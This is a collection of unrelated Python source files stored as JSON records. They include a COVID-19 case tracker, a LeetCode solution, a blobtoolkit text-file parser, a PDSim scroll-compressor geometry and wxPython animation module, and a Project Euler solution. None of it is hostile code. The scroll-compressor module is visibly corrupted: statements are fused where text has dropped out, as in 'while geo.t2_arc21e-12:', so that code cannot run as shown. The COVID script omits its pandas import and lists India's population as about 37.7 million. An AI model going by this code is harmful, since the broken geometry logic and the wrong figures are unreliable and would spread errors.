width:\n self.width = width\n self.canvas[\"width\"] = width\n if height:\n self.height = height\n self.canvas[\"height\"] = height\n\n self.image = imagepath\n size = (self.width, self.height)\n load_image(self.canvas, self.image, bounds=size)\n self.canvas.update_idletasks() # Might have to be done to canvas instead\n","repo_name":"morngrar/betterdialogs","sub_path":"betterdialogs/images.py","file_name":"images.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8092203860","text":"import matplotlib.pyplot as plt\nfrom matplotlib.dates import DateFormatter\nimport matplotlib.ticker as ticker\n\n\n# Section 2 - Loading and Selecting Data\ndf = pd.read_csv('https://raw.githubusercontent.com/datasets/covid-19/master/data/countries-aggregated.csv', parse_dates=['Date'])\ncountries = ['India','Italy', 'US', 'France', 'China']\ndf = df[df['Country'].isin(countries)]\n\n# Section 3 - Creating a Summary Column\ndf['Cases'] = df[['Confirmed', 'Recovered', 'Deaths']].sum(axis=1)\n\ndf = df.pivot(index='Date', columns='Country', values='Cases')\ncountries = list(df.columns)\ncovid = df.reset_index('Date')\ncovid.set_index(['Date'], inplace=True)\ncovid.columns = countries\n\n# Section 5 - Calculating Rates per 100,000\npopulations = {'India':37664517, 'Italy': 67802690 , 'US': 330548815, 'France': 65239883, 'China':1438027228}\npercapita = covid.copy()\nfor country in list(percapita.columns):\n percapita[country] = percapita[country]/populations[country]*100000\n new_col = country+'_DAILY'\n df[new_col] = df[country] -df[country].shift(1)\n\n\n## US State data\ndf_s = pd.read_csv('https://raw.githubusercontent.com/nytimes/covid-19-data/master/us-states.csv', parse_dates=['date'])\nstates = ['Oregon','Washington', 'New York', 'New Jersey', 'Louisiana']\ndf_s = df_s[df_s['state'].isin(states)]\n\ndf_s = df_s.pivot(index='date', columns='state', values='cases')\n\nfor st in states:\n new_col = st+'_DAILY'\n df_s[new_col] = df_s[st] -df_s[st].shift(1)\n","repo_name":"supermandar/covid19","sub_path":"covid_tracker.py","file_name":"covid_tracker.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25488966653","text":"#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Source: https://leetcode.com/problems/check-if-number-is-a-sum-of-powers-of-three/\n# Author: Miao Zhang\n# Date: 2021-06-07\n\nclass Solution:\n def checkPowersOfThree(self, n: int) -> bool:\n last = float('inf')\n while n:\n p = 0\n cur = 1\n while cur * 3 <= n:\n cur *= 3\n p += 1\n if p == last: return False\n last = p\n n -= cur\n return True\n","repo_name":"MichelleZ/leetcode","sub_path":"algorithms/python/checkifNumberisaSumofPowersofThree/checkifNumberisaSumofPowersofThree.py","file_name":"checkifNumberisaSumofPowersofThree.py","file_ext":"py","file_size_in_byte":507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"35299649341","text":"#!/usr/bin/env python3\n# pylint: disable=too-many-locals,too-many-branches,too-many-arguments,too-many-statements,too-many-nested-blocks\n\n\"\"\"Parse text files into fields.\"\"\"\n\nimport math\nimport pathlib\nimport re\nfrom collections import defaultdict\n\nfrom ..lib import file_io\nfrom .field import Array\nfrom .field import Category\nfrom .field import MultiArray\nfrom .field import Variable\n\n\ndef parse_header_row(delimiter, header_row, columns):\n \"\"\"Parse header row.\"\"\"\n head = re.split(delimiter, header_row)\n for i, col in enumerate(columns):\n try:\n index, name = col.split(\"=\")\n if not index.isdigit():\n try:\n index = head.index(index)\n columns[i] = \"%d=%s\" % (index + 1, name)\n except ValueError:\n pass\n except ValueError:\n if col.isdigit():\n try:\n columns[i] = \"%s=%s\" % (col, head[int(col) - 1])\n except IndexError:\n exit(\"ERROR: column index out of range '%s'\" % col)\n else:\n try:\n index = head.index(col)\n columns[i] = \"%s=%s\" % (str(index + 1), col)\n except ValueError:\n pass\n if not columns:\n return head\n return columns\n\n\ndef map_fields(delimiter, first_row, columns):\n \"\"\"Set column headers and field types.\"\"\"\n sample_data = re.split(delimiter, first_row)\n width = len(sample_data)\n cols = []\n headers = {}\n types = {}\n for i, col in enumerate(columns):\n if col:\n try:\n index, name = col.split(\"=\")\n if index.isdigit() and width >= int(index):\n cols.append(int(index) - 1)\n headers[int(index) - 1] = name\n else:\n exit(\"ERROR: column index out of range '%s'\" % col)\n except ValueError:\n if col.isdigit():\n exit(\"ERROR: no name specified for column %s\" % col)\n else:\n cols.append(i)\n headers[i] = col\n for col in cols:\n if re.search(\"identifier\", headers[col], re.IGNORECASE):\n types[headers[col]] = \"Identifier\"\n else:\n datum = sample_data[col]\n try:\n float(datum)\n types[headers[col]] = \"Variable\"\n except ValueError:\n types[headers[col]] = \"Category\"\n return cols, headers, types, width\n\n\ndef parse_rows(delimiter, lines, width, no_array, cols, types, headers):\n \"\"\"Parse rows and test for duplicate identifiers.\"\"\"\n ids = set()\n rows = []\n id_rows = defaultdict(list)\n index = 0\n array = False\n for line in lines:\n line = line.replace('\"', \"\")\n data = re.split(delimiter, line)\n if len(data) < width:\n continue\n row = {}\n for col in cols:\n if types[headers[col]] == \"Identifier\":\n if data[col] in ids:\n if no_array:\n exit(\n \"ERROR: found multiple instances of Identifier '%s'\"\n % data[col]\n )\n array = True\n ids.add(data[col])\n id_rows[data[col]].append(index)\n index += 1\n else:\n row[headers[col]] = data[col]\n rows.append(row)\n return rows, id_rows, array, ids\n\n\ndef rows_to_results(rows, id_rows, types, array, field_name):\n \"\"\"Make fields from rows.\"\"\"\n field_names = [type for type in types.keys() if types[type] != \"Identifier\"]\n if field_name:\n results = {field_name: {}}\n else:\n results = {name: {} for name in field_names}\n for ident, indices in id_rows.items():\n if field_name:\n if len(field_names) > 1:\n results[field_name][ident] = []\n elif array:\n for name in field_names:\n results[name][ident] = []\n for index in indices:\n row = rows[index]\n if field_name:\n data = [row[name] for name in field_names]\n if len(field_names) == 1:\n data = data[0]\n if array:\n results[field_name][ident].append(data)\n else:\n results[field_name][ident] = data\n else:\n for name in field_names:\n if array:\n results[name][ident].append([row[name]])\n else:\n results[name][ident] = row[name]\n return results\n\n\ndef results_to_fields(results, types, cols, headers, text_file, delimiter, identifiers):\n \"\"\"Convert results to fields.\"\"\"\n fields = []\n field_types = {\n \"Variable\": Variable,\n \"Category\": Category,\n \"Array\": Array,\n \"MultiArray\": MultiArray,\n }\n array_type = \"array\"\n for col in cols:\n if types[headers[col]] == \"Identifier\":\n id_column = col\n else:\n if array_type and types[headers[col]] != array_type:\n array_type = \"mixed\"\n break\n array_type = \"string\" if types[headers[col]] == \"Category\" else \"float\"\n for key, values in results.items():\n ident, sample = next(iter(values.items()))\n blank = \"NA\" if types[headers[col]] == \"Category\" else 0\n if not identifiers.validate_list(list(results[key].keys())):\n print(\n \"WARN: Contig names in the text file did not match dataset identifiers.\"\n )\n kwargs = {\n \"meta\": {\n \"field_id\": key,\n \"name\": key,\n \"preload\": False,\n \"active\": False,\n \"file\": text_file,\n \"id_column\": id_column,\n \"delimiter\": delimiter,\n \"datatype\": array_type,\n },\n \"parents\": [],\n }\n if isinstance(sample, list):\n blank = []\n array_headers = []\n index = -1\n if key in types:\n array_headers.append(key)\n if types[key] == \"Category\" and \"category_slot\" not in kwargs:\n kwargs.update({\"category_slot\": 0})\n else:\n for col in cols:\n if types[headers[col]] != \"Identifier\":\n index += 1\n array_headers.append(headers[col])\n if (\n types[headers[col]] == \"Category\"\n and \"category_slot\" not in kwargs\n ):\n kwargs.update({\"category_slot\": index})\n kwargs.update({\"headers\": array_headers})\n if isinstance(sample[0], list):\n field_type = field_types[\"MultiArray\"]\n kwargs.update({\"type\": \"multiarray\"})\n else:\n field_type = field_types[\"Array\"]\n kwargs.update({\"type\": \"array\"})\n else:\n field_type = field_types[types[key]]\n kwargs.update({\"type\": types[key].lower()})\n\n if kwargs[\"type\"] == \"variable\":\n vals = []\n is_float = False\n for ident in identifiers.values:\n value = results[key][ident] if ident in results[key] else blank\n vals.append(value)\n if kwargs[\"type\"] == \"variable\" and not is_float:\n try:\n int(value)\n except ValueError:\n is_float = True\n min_max = [math.inf, -math.inf]\n values = []\n for value in vals:\n value = float(value) if is_float else int(value)\n values.append(value)\n min_max = [min(min_max[0], value), max(min_max[1], value)]\n kwargs[\"meta\"].update({\"range\": min_max})\n if is_float:\n kwargs[\"meta\"].update({\"datatype\": \"float\"})\n else:\n kwargs[\"meta\"].update({\"datatype\": \"integer\"})\n if min_max[0] < 0 or min_max[0] > min_max[1] / 1000:\n kwargs[\"meta\"].update({\"scale\": \"scaleLinear\"})\n else:\n kwargs[\"meta\"].update({\"scale\": \"scaleLog\"})\n if min_max[0] == 0:\n kwargs[\"meta\"].update({\"clamp\": 0.01})\n else:\n values = [\n results[key][ident] if ident in results[key] else blank\n for ident in identifiers.values\n ]\n if kwargs[\"type\"] == \"category\":\n kwargs[\"meta\"].update({\"datatype\": \"string\"})\n field = field_type(key, values=values, **kwargs)\n fields.append(field)\n return fields\n\n\ndef set_delimiter(delimiter, *, sample=None):\n \"\"\"Set text delimiter.\"\"\"\n if delimiter == \"whitespace\":\n if sample is not None:\n if \"\\t\" in sample:\n return re.compile(r\"\\t\")\n return re.compile(r\"\\s+\")\n else:\n return re.compile(r\"%s\" % delimiter)\n\n\ndef parse_text(text_file, delimiter, columns, header, no_array, identifiers):\n \"\"\"Parse text file into Category and/or Variable fields.\"\"\"\n try:\n text_file, field_name = text_file.split(\"=\")\n except ValueError:\n field_name = False\n data = file_io.read_file(text_file)\n lines = data.split(\"\\n\")\n delimit = set_delimiter(delimiter, sample=lines[0])\n if columns:\n columns = columns.split(\",\")\n else:\n columns = []\n if header:\n header_row = lines.pop(0).replace('\"', \"\")\n columns = parse_header_row(delimit, header_row, columns)\n cols, headers, types, width = map_fields(\n delimit, lines[0].replace('\"', \"\"), columns\n )\n rows, id_rows, array = parse_rows(\n delimit, lines, width, no_array, cols, types, headers\n )[:3]\n # if not identifiers.validate_list(list(ids)):\n # exit('ERROR: contig names in the text file did not match dataset identifiers.')\n results = rows_to_results(rows, id_rows, types, array, field_name)\n fields = results_to_fields(\n results, types, cols, headers, text_file, delimiter, identifiers\n )\n # meta = {'file': text_file}\n return fields\n # results = defaultdict(list)\n # for line in lines:\n # if header:\n # row = re.split(' +', line)\n # if len(row) > 1:\n # if row[1].startswith('v.'):\n # meta.update({'version': row[1]})\n # elif row[1] == 'Mode:':\n # meta.update({'mode': row[2]})\n # meta.update({'field_id': \"trnascan_%s\" % row[2].lower()})\n # elif row[1].startswith('------'):\n # header = False\n # else:\n # row = re.split(r' +|\\t', line)\n # if len(row) == 9:\n # results[row[0]].append([row[4], row[5]])\n # if not identifiers.validate_list(list(results.keys())):\n # raise UserWarning('Contig names in the tRNAScan file did not match dataset identifiers.')\n # values = [results[id] if id in results else [] for id in identifiers.values]\n # trnascan_field = MultiArray(meta['field_id'],\n # values=values,\n # meta=meta,\n # headers=('tRNA_type', 'Anticodon'),\n # parents=['children']\n # )\n # return trnascan_field\n\n\ndef apply_filter(ids, text_file, **kwargs):\n \"\"\"Filter Text file.\"\"\"\n suffix = kwargs[\"--suffix\"]\n path = pathlib.Path(text_file)\n outfile = str(path.parent / (path.stem + \".\" + suffix + path.suffix))\n data = file_io.read_file(text_file)\n lines = data.split(\"\\n\")\n delimiter = kwargs[\"--text-delimiter\"]\n delimit = set_delimiter(delimiter, sample=lines[0])\n id_col = int(kwargs[\"--text-id-column\"]) - 1\n output = []\n if kwargs[\"--text-header\"]:\n header_row = lines.pop(0)\n header_row.rstrip()\n output.append(header_row)\n for line in lines:\n line = line\n row = re.split(delimit, line.replace('\"', \"\"))\n try:\n if row[id_col] in ids:\n output.append(line)\n except IndexError:\n output.append(line)\n file_io.write_file(outfile, output, plain=True)\n\n\ndef parse(files, **kwargs):\n \"\"\"Parse all text files.\"\"\"\n parsed = []\n for file in files:\n try:\n fileData = parse_text(\n file,\n delimiter=kwargs[\"--text-delimiter\"],\n columns=kwargs[\"--text-cols\"],\n header=kwargs[\"--text-header\"],\n no_array=kwargs[\"--text-no-array\"],\n identifiers=kwargs[\"dependencies\"][\"identifiers\"],\n )\n except AttributeError:\n continue\n parsed = parsed + fileData\n return parsed\n\n\ndef parent():\n \"\"\"Set standard metadata for text.\"\"\"\n return []\n","repo_name":"blobtoolkit/blobtoolkit","sub_path":"src/blobtools/lib/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":13191,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"32"} +{"seq_id":"35366805285","text":"from __future__ import print_function\n\nfig_size = [8,10]\n\nimport math\nimport numpy as np\nimport pylab\nfrom pylab import arange,pi,sin,cos,sqrt,tan\nimport threading\nimport wx\n\nimport os\n#import scrollCalcs as Calcs\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_wxagg import FigureCanvasWxAgg as FigureCanvas\nglobal geo,setDiscGeo,coords_inv,circle,sortAnglesCCW,Shave,plotScrollSet\nglobal polyarea,theta_d\nimport matplotlib.pyplot as pyplot\nfrom PDSim.scroll import common_scroll_geo\nfrom PDSim.scroll.common_scroll_geo import coords_inv, coords_norm\n \nclass geoVals:\n \"\"\" \n A class which contains the fields related the \n scroll compressor geometry\n \"\"\"\n # Default values for Sanden Compressor #\n ## DO NOT MODIFY THESE VALUES ##\n rb=0.003522\n phi_i0=0.19829\n phi_is=4.7\n phi_ie=15.5\n phi_o0=-1.1248\n phi_os=1.8\n phi_oe=15.5\n h=0.03289\n disc_x0=-0.007\t\n disc_y0=-0.0011\t\n disc_R=0.0060198\n\n def __init__(self, **kwargs):\n self.Load()\n def Load(self):\n # Default values for Sanden Compressor #\n ## DO NOT MODIFY THESE VALUES ##\n self.rb=0.003522\n self.phi_i0=0.19829\n self.phi_is=4.7\n self.phi_ie=15.5\n self.phi_o0=-1.1248\n self.phi_os=1.8\n self.phi_oe=15.5\n self.h=0.03289\n # disc_x0=-0.007\t\n # disc_y0=-0.0011\t\n # disc_R=0.0060198\n self.ro=self.rb*(pi-self.phi_i0+self.phi_o0)\n #Load a default discharge geometry\n setDiscGeo(self)\n\ndef LoadGeo():\n \"\"\"\n Returns a class containing the default parameters for the scroll compressor\n \n ======= =========\n r_b 0.003522 \n phi_i0 0.19829\n phi_is 4.7\n phi_ie 15.5\n phi_o0 -1.1248\n phi_os 1.8\n phi_oe 15.5\n h 0.03289\n disc_x0 -0.007\n disc_y0 -0.0011\n disc_R 0.0060198\n ======= =========\n \n \"\"\"\n return geoVals()\n \ndef setDiscGeo(geo,Type='Sanden',r2=0.001,**kwargs):\n \"\"\"\n Sets the discharge geometry for the compressor based on the arguments.\n Also sets the radius of the wall that contains the scroll set\n \n Arguments:\n geo : geoVals class\n class containing the scroll compressor geometry\n Type : string\n Type of discharge geometry, options are ['Sanden'],'2Arc','ArcLineArc'\n r2 : float or string\n Either the radius of the smaller arc as a float or 'PMP' for perfect meshing\n If Type is 'Sanden', this value is ignored\n \n Keyword Arguments:\n \n ======== ======================================================================\n Value Description\n ======== ======================================================================\n r1 the radius of the large arc for the arc-line-arc solution type\n ======== ======================================================================\n \n \"\"\"\n \n #Recalculate the orbiting radius\n geo.ro=geo.rb*(pi-geo.phi_i0+geo.phi_o0)\n if Type == 'Sanden':\n geo.x0_wall=0.0\n geo.y0_wall=0.0\n geo.r_wall=0.065\n setDiscGeo(geo,Type='ArcLineArc',r2=0.003178893902,r1=0.008796248080)\n elif Type == '2Arc':\n (x_is,y_is) = common_scroll_geo.coords_inv(geo.phi_is,geo,0,'fi') \n (x_os,y_os) = common_scroll_geo.coords_inv(geo.phi_os,geo,0,'fo')\n (nx_is,ny_is) = common_scroll_geo.coords_norm(geo.phi_is,geo,0,'fi')\n (nx_os,ny_os) = common_scroll_geo.coords_norm(geo.phi_os,geo,0,'fo')\n dx=x_is-x_os\n dy=y_is-y_os\n \n r2max=0\n a=cos(geo.phi_os-geo.phi_is)+1.0\n b=geo.ro*a-dx*(sin(geo.phi_os)-sin(geo.phi_is))+dy*(cos(geo.phi_os)-cos(geo.phi_is))\n c=1.0/2.0*(2.0*dx*sin(geo.phi_is)*geo.ro-2.0*dy*cos(geo.phi_is)*geo.ro-dy**2-dx**2)\n if abs((geo.phi_os+pi)-geo.phi_is) < 1e-8:\n r2max=-c/b\n elif geo.phi_os-(geo.phi_is-pi)>1e-12:\n r2max=(-b+sqrt(b**2-4.0*a*c))/(2.0*a)\n else:\n print('error with starting angles phi_os %.16f phi_is-pi %.16f' %(geo.phi_os,geo.phi_is-pi))\n \n if type(r2) is not float and r2=='PMP':\n r2=r2max\n \n if r2>r2max:\n print('r2 is too large, max value is : %0.5f' %(r2max))\n \n xarc2 = x_os+nx_os*r2\n yarc2 = y_os+ny_os*r2\n \n r1=((1.0/2*dy**2+1.0/2*dx**2+r2*dx*sin(geo.phi_os)-r2*dy*cos(geo.phi_os))\n /(r2*cos(geo.phi_os-geo.phi_is)+dx*sin(geo.phi_is)-dy*cos(geo.phi_is)+r2))\n \n \n ## Negative sign since you want the outward pointing unit normal vector\n xarc1 = x_is-nx_is*r1\n yarc1 = y_is-ny_is*r1\n \n geo.xa_arc2=xarc2\n geo.ya_arc2=yarc2\n geo.ra_arc2=r2\n geo.t1_arc2=math.atan2(yarc1-yarc2,xarc1-xarc2)\n geo.t2_arc2=math.atan2(y_os-yarc2,x_os-xarc2)\n while geo.t2_arc21e-12:\n r2max=(-b+sqrt(b**2-4.0*a*c))/(2.0*a)\n elif geo.phi_os-(geo.phi_is-pi)<1e-12:\n r2max=-c/b\n else:\n print('error with starting angles phi_os %.16f phi_is-pi %.16f' %(geo.phi_os,geo.phi_is-pi))\n \n if type(r2) is not float and r2=='PMP':\n r2=r2max\n \n if r2>r2max:\n print('r2 is too large, max value is : %0.5f' %(r2max))\n \n xarc2 = x_os+nx_os*r2\n yarc2 = y_os+ny_os*r2\n \n if 'r1' not in kwargs:\n r1=r2+geo.ro\n else:\n r1=kwargs['r1']\n \n ## Negative sign since you want the outward pointing unit normal vector\n xarc1 = x_is-nx_is*r1\n yarc1 = y_is-ny_is*r1\n \n geo.xa_arc2=xarc2\n geo.ya_arc2=yarc2\n geo.ra_arc2=r2\n geo.t2_arc2=math.atan2(y_os-yarc2,x_os-xarc2)\n \n geo.xa_arc1=xarc1\n geo.ya_arc1=yarc1\n geo.ra_arc1=r1\n geo.t2_arc1=math.atan2(y_is-yarc1,x_is-xarc1)\n \n alpha=math.atan2(yarc2-yarc1,xarc2-xarc1)\n d=sqrt((yarc2-yarc1)**2+(xarc2-xarc1)**2)\n beta=math.acos((r1+r2)/d)\n L=sqrt(d**2-(r1+r2)**2)\n t1=alpha+beta\n \n (xint,yint)=(xarc1+r1*cos(t1)+L*sin(t1),yarc1+r1*sin(t1)-L*cos(t1))\n t2=math.atan2(yint-yarc2,xint-xarc2)\n \n geo.t1_arc1=t1\n# (geo.t1_arc1,geo.t2_arc1)=sortAnglesCW(geo.t1_arc1,geo.t2_arc1)\n \n geo.t1_arc2=t2\n# (geo.t1_arc2,geo.t2_arc2)=sortAnglesCCW(geo.t1_arc2,geo.t2_arc2)\n\n while geo.t2_arc20)\n \n self.ax = self.pltpanel.axes\n \n if disc_xy_coords is not None:\n self.ax.plot(disc_xy_coords[0], disc_xy_coords[1])\n \n sizer.Layout()\n \n self.SetSize(sizer.GetMinSize())\n \n self.writing_animation = False\n self.param_dict = param_dict\n self.orbiting_layers = []\n if start:\n self.start()\n \n def OnSaveAnimation(self, event):\n self.SaveAnimation.Enable(False)\n self.writing_animation = True\n \n def OnDoneSavingAnimation(self):\n self.SaveAnimation.Enable(True)\n self.writing_animation = False\n \n import subprocess\n subprocess.call('convert frame_*.png frames.gif',shell = True)\n import glob\n for file in glob.glob('frame_*.png'):\n os.remove(file)\n print('all done - saved to frames.gif')\n \n def OnApplyLayers(self, event):\n self.remove_orbiting_layers()\n self.ax.cla()\n self.OS = plotScrollSet(self.theta,\n axis=self.pltpanel.axes,\n geo=self.geo,\n lw=1,\n discOn=False,\n offsetScroll = self.geo.phi_ie_offset>0)\n self.apply_stationary_layers()\n self.apply_orbiting_layers(self.theta)\n\n self.ax.figure.canvas.draw() #Annoyingly this draw is required to flush the ghost orbiting scroll\n \n def apply_stationary_layers(self):\n if self.LayerCoordinateAxes.IsChecked():\n \n self.ax.plot(0, 0, 'k+')\n self.ax.plot([0, 0.01], [0,0], 'k')\n self.ax.plot([0,0], [0.01, 0], 'k')\n self.ax.text(0.01,0,'$x$')\n self.ax.text(0,0.01,'$y$')\n \n def _proj_onto_xd(self, x, y, beta):\n \n # unit vector pointing in the +xbeta direction\n ubeta = np.array([cos(beta),sin(beta)])\n r = np.array([x,y])\n proj = np.dot(r,ubeta)*ubeta\n return proj\n \n def _proj_onto_yd(self, x, y, beta):\n \n # unit vector pointing in the +xbeta direction\n ubeta = np.array([-cos(beta),sin(beta)])\n r = np.array([x,y])\n proj = np.dot(r,ubeta)*ubeta\n return proj\n \n def apply_orbiting_layers(self, theta = 0):\n \n self.remove_orbiting_layers()\n \n def rotated_rectangle(x0,y0,w,h,rot):\n \n x = np.array([-w/2,w/2,w/2,-w/2,-w/2])\n y = np.array([-h/2,-h/2,h/2,h/2,-h/2])\n \n xrot = x*cos(rot)-y*sin(rot)\n yrot = x*sin(rot)+y*cos(rot) \n \n return xrot+x0, yrot+y0\n \n if self.LayerCoordinateAxes.IsChecked():\n \n om = self.geo.phi_ie-theta-pi/2.0\n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n self.orbiting_layers.append(self.ax.plot(xo, yo, 'ko')[0])\n \n beta = self.param_dict.get('beta', pi/6)\n rring = self.param_dict.get('oldham_ring_radius', 0.04)\n lkey = wkey = self.param_dict.get('oldham_key_width', 0.005)\n \n \n if self.LayerOldham.IsChecked():\n \n om = self.geo.phi_ie-theta-pi/2.0\n \n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n OSkeys = [dict(r = rring, width = wkey, length = lkey, xbeta_offset = self.param_dict['pin3_xbeta_offset']),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi, xbeta_offset = self.param_dict['pin4_xbeta_offset'])]\n FSkeys = [dict(r = rring, width = wkey, length = lkey, ybeta_offset = self.param_dict['pin1_ybeta_offset']),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi, ybeta_offset = self.param_dict['pin2_ybeta_offset'])]\n \n for key in OSkeys:\n r = key['r']\n width = key['width']\n length = key['length']\n xbeta_offset = key['xbeta_offset']\n betaplus = key.get('betaplus',0)\n \n betakey = beta + betaplus + pi/2\n \n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n xbeta = self.geo.ro*cos(om)*cos(beta)+self.geo.ro*sin(om)*sin(beta) + xbeta_offset\n ybeta = 0 \n \n xoffset = xbeta*cos(beta)+ybeta*sin(beta)\n yoffset = xbeta*sin(beta)-ybeta*cos(beta)\n \n xoffset_slot = xbeta_offset*cos(beta) #ybeta_offset is zero\n yoffset_slot = xbeta_offset*sin(beta)\n \n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),length+3*self.geo.ro,width,beta+pi/2)\n self.orbiting_layers.append(self.ax.fill(x+xo+xoffset_slot, y+yo+yoffset_slot, 'green', alpha = 0.5)[0])\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),width,length,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset,y+yoffset,'k')[0])\n \n for key in FSkeys:\n \n r = key['r']\n width = key['width']\n length = key['length']\n ybeta_offset = key['ybeta_offset']\n betaplus = key.get('betaplus',0)\n \n betakey = beta + betaplus\n \n xbeta = self.geo.ro*cos(om)*cos(beta)+self.geo.ro*sin(om)*sin(beta)\n ybeta = ybeta_offset\n \n xoffset = xbeta*cos(beta)+ybeta*sin(beta)\n yoffset = xbeta*sin(beta)-ybeta*cos(beta)\n \n xoffset_slot = ybeta_offset*sin(beta) # xbeta offset is zero\n yoffset_slot = -ybeta_offset*cos(beta) # ybeta_offset is zero\n \n # The slot\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),length+3*self.geo.ro,width,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset_slot, y+yoffset_slot, 'yellow', alpha = 0.5)[0])\n \n # The key\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),width,length,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset, y+yoffset, 'k')[0])\n \n if self.LayerOrbitingScroll.IsChecked():\n \n om = self.geo.phi_ie-theta-pi/2.0\n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n OSkeys = [dict(r = rring, width = wkey, length = lkey),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi)]\n FSkeys = [dict(r = rring, width = wkey, length = lkey),\n dict(r = rring, width = wkey, length = lkey, betaplus = pi)]\n \n for key in OSkeys:\n r = key['r']\n width = key['width']\n length = key['length']\n betaplus = key.get('betaplus',0)\n \n betakey = beta + betaplus + pi/2\n \n xo = self.geo.ro*cos(om)\n yo = self.geo.ro*sin(om)\n \n xbeta = self.geo.ro*cos(om)*cos(beta)+self.geo.ro*sin(om)*sin(beta)\n ybeta = 0 \n \n xoffset = xbeta*cos(beta)+ybeta*sin(beta)\n yoffset = xbeta*sin(beta)-ybeta*cos(beta)\n \n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),length+3*self.geo.ro,width,beta+pi/2)\n self.orbiting_layers.append(self.ax.fill(x+xo,y+yo,'green', alpha = 0.5)[0])\n x,y = rotated_rectangle(r*cos(betakey),r*sin(betakey),width,length,beta)\n self.orbiting_layers.append(self.ax.fill(x+xoffset,y+yoffset,'k')[0])\n \n self.ax.set_autoscale_on(True)\n \n def remove_orbiting_layers(self):\n #Clean out all the items from the orbiting layers\n for item in self.orbiting_layers:\n item.remove() # Remove from the GUI\n self.orbiting_layers = []\n \n def start(self):\n \"\"\"\n Start the plotting machinery\n \"\"\"\n self.PT=PlotThread()\n self.PT.setDaemon(True)\n self.PT.setGUI(self) #pass it an instance of the frame (by reference)\n self.PT.setInterval(0.05) #delay between plot events\n self.PT.start()\n \n def onButton(self, event):\n \"\"\"\n Runs the thread\n \"\"\"\n btn = event.GetEventObject()\n if btn.GetValue()==True:\n btn.SetLabel(\"Stop\")\n else:\n btn.SetLabel(\"Start\")\n \n def updateDisplay(self):\n wx.CallAfter(self._updateDisplay)\n \n def _updateDisplay(self):\n \"\"\"\n Updates the animation\n \"\"\"\n if self.Animate==True:\n wx.CallAfter(self.plotStep)\n self.plotThread=threading.Timer(0.001, self.updateDisplay)\n self.plotThread.daemon=True\n self.plotThread.start()\n\n def plotStep(self):\n \n self.remove_orbiting_layers()\n \n self.theta += 2*np.pi/(self.N-1)\n \n # Plot the orbiting layers\n self.apply_orbiting_layers(self.theta)\n \n #If offset scroll, don't shave the orbiting scroll \n (x,y)=CoordsOrbScroll(self.theta,\n self.geo,\n shaveOn = self.geo.phi_ie_offset < 1e-12\n )\n \n #Create the data for the orbiting scroll\n self.OS.set_xy(np.hstack((x,y)))\n self.ax.figure.canvas.draw() #Annoyingly this draw is required to flush the ghost orbiting scroll\n self.SetTitle('theta = '+str(self.theta)+' radians')\n \n if self.writing_animation:\n if not hasattr(self,'frame_counter_start'):\n self.frame_counter = self.frame_counter_start = 0\n fName = 'frame_{i:04d}.png'.format(i=self.frame_counter)\n self.ax.figure.savefig(fName)\n print('saving', fName)\n self.frame_counter += 1\n if self.frame_counter == self.N-1:\n self.OnDoneSavingAnimation()\n\n def preClose(self,event):\n \"\"\"\n This runs at the beginning of the closing event to deal with cleanup\n of threads and the GUI\n \"\"\"\n self.PT.shutdown()\n self.Destroy()\n\nif __name__== \"__main__\":\n \n from PDSim.scroll.core import Scroll\n \n ScrollComp = Scroll()\n ScrollComp.set_scroll_geo(83e-6, 3.3, 0.005, 0.006) #Set the scroll wrap geometry\n ScrollComp.set_disc_geo('2Arc',r2 = 0)\n ScrollComp.geo.phi_ie_offset = 0\n \n app = wx.App()\n frame = ScrollAnimForm(ScrollComp.geo)\n frame.Show()\n app.MainLoop()\n \n \n\n \n# pylab.fill(x,y)\n# pylab.show()\n## pylab.show()\n pass\n \n","repo_name":"ibell/pdsim","sub_path":"PDSim/scroll/plots.py","file_name":"plots.py","file_ext":"py","file_size_in_byte":45735,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"32"} +{"seq_id":"19071605642","text":"import itertools\n\n\ndef square_laminae(n):\n max_side = n // 4 + 1\n\n count = 0\n for side in range(3, max_side + 1):\n squares_used = side * 4 + 4\n count += 1\n for layer in itertools.count(1):\n layer_side = side - layer * 2\n if layer_side < 1:\n break\n squares_used += layer_side * 4 + 4\n if squares_used > n:\n break\n count += 1\n\n return count\n\n\nprint(square_laminae(1000000))\n","repo_name":"simonolander/euler","sub_path":"euler-173.py","file_name":"euler-173.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"34878868868","text":"import glob\nimport os\nimport re\nimport numpy as np\nimport pandas as pd\nfrom datatable import dt, fread, iread, join, by, rbind, cbind, f\n\n\ndef combine_all_pset_tables(data_dir, output_dir):\n \"\"\"\n Combine all PSet tables into the final PharmacoDB tables.\n\n @param data_dir: [`string`] The file path to read the PSet tables\n @param output_dir: [`string`] The file path to write the final tables\n @return: [`dict(string: datatable.Frame)`] A dictionary of all some of the\n final tables, with names as keys, to be used for later joins\n \"\"\"\n print(\"Combining all PSet tables...\")\n join_dfs = combine_primary_tables(data_dir, output_dir)\n join_dfs = combine_secondary_tables(data_dir, output_dir, join_dfs)\n 